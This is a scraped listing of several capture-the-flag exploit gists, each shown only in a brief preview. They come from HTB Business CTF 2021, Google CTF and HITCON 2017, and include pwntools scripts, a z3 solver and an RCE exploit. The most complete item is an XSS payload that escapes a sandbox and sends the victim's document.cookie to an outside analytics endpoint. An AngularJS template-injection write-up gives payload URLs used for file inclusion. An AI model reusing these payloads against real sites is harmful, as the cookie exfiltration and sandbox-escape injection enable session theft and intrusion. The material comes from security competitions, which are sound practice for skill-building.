This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
Exploit for the "Employee Manager" pwning challenge | |
HTB Business CTF 2021 | |
DeteAct (https://pentest.global/) | |
''' | |
import re | |
from pwn import * |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
Exploit for the "Spim Panel" pwning challenge | |
HTB Business CTF 2021 | |
DeteAct (https://pentest.global/) | |
''' | |
from pwn import * | |
def pack(x): | |
return p32(x, endian='big') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from math import pi | |
from socket import socket | |
s = socket() | |
s.connect(('quantum.kelte.cc', 17171)) | |
prog = '' | |
# Hadamard for the 0th qubit | |
prog += 'H\n' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from urllib import quote_plus | |
ga_tid = 'UA-***-1' # put your GA id here | |
url = 'https://gcalc2.web.ctfcompetition.com/' | |
url += r'?expr=vars.pi.constructor.name.constructor.constructor(vars.pi.constructor.name.match().constructor(vars).keys().constructor.keys(vars).pop())()&vars=%7B%22pi%22:1.0,%22' | |
url += quote_plus(''' | |
script = document.createElement('script');script.src='https://www.google-analytics.com/collect?v=1&tid=%s&cid='+Math.random()+'&t=event&ec=email&el='+Math.random()+'&cs=newsletter&cm=email&cn='+document.cookie+'&cm1=1&ea=test';document.head.appendChild(script); | |
'''.replace('"', '\\"').replace('\n','') % ga_tid) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This web application implements a translation service with dictionary stored in memory. | |
One can dump the JSON dictionary and add values to it. | |
Upon observing the dumped dictionary it becomes obvious that the application performs server-side AngularJS rendering on some of the dictionary keys (which are rather web-site messages, not the words). | |
The solution is to overwrite the rendered dictionary value and to enumerate methods accessible inside AngularJS sandbox and find a method which allows local file inclusion. | |
Executing Object.keys(): | |
http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{i18n.constructor.prototype.constructor.keys(i18n)}} | |
Reading the flag: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time | |
import sys | |
from collections import defaultdict | |
from ctypes import CDLL | |
from pwn import * | |
from z3 import * | |
s = Solver() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
HITCON CTF Quals 2017 BabyFirst Revenge v2 exploit | |
Task was to leverage 4-byte shell command execution in PHP to full RCE | |
''' | |
from requests import get, post | |
URL = 'http://52.197.41.31/?' | |
print 'Reset all' |